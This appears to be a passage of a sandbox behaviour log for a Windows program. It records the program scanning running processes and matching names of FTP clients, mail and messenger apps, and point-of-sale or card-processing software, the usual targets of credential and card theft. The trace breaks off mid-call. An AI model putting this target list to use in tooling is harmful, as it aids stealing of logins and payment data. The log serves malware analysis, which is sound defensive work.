[0106.535] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0106.535] CloseHandle (hObject=0x0) returned 0 [0106.535] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0106.535] CloseHandle (hObject=0x0) returned 0 [0106.535] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0106.535] CloseHandle (hObject=0x0) returned 0 [0106.535] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0106.535] CloseHandle (hObject=0x0) returned 0 [0106.535] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0106.535] CloseHandle (hObject=0x0) returned 0 [0106.535] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5c0 [0106.535] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 0 [0106.535] CloseHandle (hObject=0x5c0) returned 1 [0106.536] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x5c0 [0106.536] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 0 [0106.536] CloseHandle (hObject=0x5c0) returned 1 [0106.536] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0106.536] CloseHandle (hObject=0x0) returned 0 [0106.536] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0106.536] CloseHandle (hObject=0x0) returned 0 [0106.536] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5c0 [0106.536] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 0 [0106.536] CloseHandle (hObject=0x5c0) returned 1 [0106.536] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x5c0 [0106.536] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 0 [0106.537] CloseHandle (hObject=0x5c0) returned 1 [0106.537] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x67c) returned 0x5c0 [0106.537] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.538] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xc40000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="herb cos completed.exe") returned 0x16 [0106.538] CloseHandle (hObject=0x5c0) returned 1 [0106.538] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x5c0 [0106.539] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.540] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1210000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="dealers.exe") returned 0xb [0106.540] CloseHandle (hObject=0x5c0) returned 1 [0106.540] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x5c0 [0106.540] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.541] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1350000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="hall-stronger.exe") returned 0x11 [0106.542] CloseHandle (hObject=0x5c0) returned 1 [0106.542] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a8) returned 0x5c0 [0106.542] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.543] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1380000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="rp-hip.exe") returned 0xa [0106.543] CloseHandle (hObject=0x5c0) returned 1 [0106.543] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x564) returned 0x5c0 [0106.543] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.545] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x340000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="karma_coat.exe") returned 0xe [0106.545] CloseHandle (hObject=0x5c0) returned 1 [0106.545] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x560) returned 0x5c0 [0106.545] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.546] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1070000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="plenty_leather.exe") returned 0x12 [0106.546] CloseHandle (hObject=0x5c0) returned 1 [0106.546] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x23c) returned 0x5c0 [0106.546] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.548] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1180000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="entrytrackbackspatent.exe") returned 0x19 [0106.548] CloseHandle (hObject=0x5c0) returned 1 [0106.548] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2a8) returned 0x5c0 [0106.548] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.549] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xee0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="busy.exe") returned 0x8 [0106.549] CloseHandle (hObject=0x5c0) returned 1 [0106.549] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x114) returned 0x5c0 [0106.550] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.551] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd70000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="sudan_territory.exe") returned 0x13 [0106.551] CloseHandle (hObject=0x5c0) returned 1 [0106.551] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x79c) returned 0x5c0 [0106.551] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.552] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x360000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="catalogs intelligent.exe") returned 0x18 [0106.553] CloseHandle (hObject=0x5c0) returned 1 [0106.553] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x790) returned 0x5c0 [0106.553] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.555] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x830000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="prisonermounted.exe") returned 0x13 [0106.556] CloseHandle (hObject=0x5c0) returned 1 [0106.556] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x798) returned 0x5c0 [0106.556] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.557] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1220000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="extensive.exe") returned 0xd [0106.557] CloseHandle (hObject=0x5c0) returned 1 [0106.557] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e8) returned 0x5c0 [0106.557] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.558] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xde0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="posters-baker-lift.exe") returned 0x16 [0106.559] CloseHandle (hObject=0x5c0) returned 1 [0106.559] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x544) returned 0x5c0 [0106.559] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.560] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xc80000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="emperor_respected.exe") returned 0x15 [0106.560] CloseHandle (hObject=0x5c0) returned 1 [0106.560] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x40c) returned 0x5c0 [0106.560] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.561] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x11f0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="illinois indicated regional.exe") returned 0x1f [0106.562] CloseHandle (hObject=0x5c0) returned 1 [0106.562] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c8) returned 0x5c0 [0106.562] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.563] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x2f0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="apartmentscontemporary.exe") returned 0x1a [0106.563] CloseHandle (hObject=0x5c0) returned 1 [0106.563] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c4) returned 0x5c0 [0106.563] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.564] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xce0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="witch-feat.exe") returned 0xe [0106.565] CloseHandle (hObject=0x5c0) returned 1 [0106.565] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5ac) returned 0x5c0 [0106.565] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.566] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x930000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0106.566] CloseHandle (hObject=0x5c0) returned 1 [0106.566] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e4) returned 0x5c0 [0106.566] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.568] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x20000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0106.568] CloseHandle (hObject=0x5c0) returned 1 [0106.568] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x24c) returned 0x5c0 [0106.568] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.569] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1d0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0106.570] CloseHandle (hObject=0x5c0) returned 1 [0106.570] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6dc) returned 0x5c0 [0106.570] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.571] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x280000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0106.571] CloseHandle (hObject=0x5c0) returned 1 [0106.571] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x734) returned 0x5c0 [0106.571] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.573] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1060000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0106.573] CloseHandle (hObject=0x5c0) returned 1 [0106.573] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x620) returned 0x5c0 [0106.573] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.574] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1100000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0106.574] CloseHandle (hObject=0x5c0) returned 1 [0106.574] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0) returned 0x5c0 [0106.575] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.576] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xf10000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0106.576] CloseHandle (hObject=0x5c0) returned 1 [0106.576] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x414) returned 0x5c0 [0106.576] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.578] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1270000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0106.578] CloseHandle (hObject=0x5c0) returned 1 [0106.578] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x55c) returned 0x5c0 [0106.578] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.579] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x12c0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0106.579] CloseHandle (hObject=0x5c0) returned 1 [0106.579] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b0) returned 0x5c0 [0106.579] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.581] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x340000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0106.581] CloseHandle (hObject=0x5c0) returned 1 [0106.581] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x208) returned 0x5c0 [0106.581] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.582] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x130000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0106.582] CloseHandle (hObject=0x5c0) returned 1 [0106.582] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x484) returned 0x5c0 [0106.583] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.584] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe90000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0106.584] CloseHandle (hObject=0x5c0) returned 1 [0106.584] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7ec) returned 0x5c0 [0106.584] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.585] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1e0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0106.586] CloseHandle (hObject=0x5c0) returned 1 [0106.586] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x490) returned 0x5c0 [0106.586] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.587] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x20000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0106.587] CloseHandle (hObject=0x5c0) returned 1 [0106.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x31c) returned 0x5c0 [0106.587] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.589] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1280000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0106.589] CloseHandle (hObject=0x5c0) returned 1 [0106.589] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x5c0 [0106.589] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.590] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x50000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0106.590] CloseHandle (hObject=0x5c0) returned 1 [0106.590] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x5c0 [0106.590] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.592] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa30000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0106.592] CloseHandle (hObject=0x5c0) returned 1 [0106.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x5c0 [0106.592] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.593] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xbe0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0106.594] CloseHandle (hObject=0x5c0) returned 1 [0106.594] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x81c) returned 0x5c0 [0106.594] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.595] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xcc0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0106.595] CloseHandle (hObject=0x5c0) returned 1 [0106.595] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x5c0 [0106.595] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.596] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x10c0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0106.597] CloseHandle (hObject=0x5c0) returned 1 [0106.597] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x5c0 [0106.597] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.598] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x80000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0106.598] CloseHandle (hObject=0x5c0) returned 1 [0106.598] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x5c0 [0106.598] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.599] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x13d0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0106.600] CloseHandle (hObject=0x5c0) returned 1 [0106.600] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x5c0 [0106.600] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.601] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xf90000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0106.602] CloseHandle (hObject=0x5c0) returned 1 [0106.602] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x5c0 [0106.602] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.603] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x970000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0106.603] CloseHandle (hObject=0x5c0) returned 1 [0106.603] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x87c) returned 0x5c0 [0106.603] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.604] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1170000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0106.605] CloseHandle (hObject=0x5c0) returned 1 [0106.605] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x5c0 [0106.605] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.606] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x130000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0106.606] CloseHandle (hObject=0x5c0) returned 1 [0106.606] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x89c) returned 0x5c0 [0106.606] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.607] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x8c0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0106.608] CloseHandle (hObject=0x5c0) returned 1 [0106.608] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x5c0 [0106.608] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.609] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb70000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0106.609] CloseHandle (hObject=0x5c0) returned 1 [0106.609] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x5c0 [0106.609] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.610] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa30000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0106.611] CloseHandle (hObject=0x5c0) returned 1 [0106.611] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x5c0 [0106.611] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.612] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb20000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0106.612] CloseHandle (hObject=0x5c0) returned 1 [0106.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x5c0 [0106.612] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.614] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xaa0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0106.614] CloseHandle (hObject=0x5c0) returned 1 [0106.614] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x5c0 [0106.614] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.615] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x10c0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0106.616] CloseHandle (hObject=0x5c0) returned 1 [0106.616] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8fc) returned 0x5c0 [0106.616] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.617] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x9a0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0106.617] CloseHandle (hObject=0x5c0) returned 1 [0106.617] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x5c0 [0106.617] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.618] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0106.619] CloseHandle (hObject=0x5c0) returned 1 [0106.619] OpenProcess 